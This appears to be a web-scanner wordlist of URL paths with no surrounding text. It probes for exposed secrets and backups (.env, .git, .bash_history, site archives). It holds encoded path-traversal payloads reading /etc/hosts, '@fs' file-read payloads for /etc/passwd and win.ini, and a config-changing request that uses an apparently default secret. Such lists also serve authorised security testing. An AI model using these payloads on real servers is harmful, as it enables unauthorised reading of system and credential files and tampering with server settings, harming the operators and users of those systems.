/.DS_Store
/.git
/.svn
/.env
/.idea
/.bash_history
/.bash_logout
/.bash_profile
/.bashrc
/.config
/.swp
/error.log
/access.log
/bin.zip
/bin.rar
/bin.old.zip
/bin.old.rar
/nginx.conf
/web.zip
/web.rar
/web.old.zip
/web.old.rar
/1.zip
/1.rar
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc/hosts
/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc/hosts
/\%2E%2E\%2E%2E\%2E%2E\%2E%2E\%2E%2E\%2E%2E\%2E%2E\etc\hosts
/\..\..\..\..\..\..\..\etc\hosts
/@fs/etc/passwd?import&raw??
/@fs/C://Windows/win.ini?import&raw??
/lm/api/files;.css
/index/api/setServerConfig?secret=035c73f7-bb6b-4889-a715-d9eb2d1925cc&api.apiDebug=0
/?a=WKtwuea&c=2RVM&m=fv3C&s=ba5a
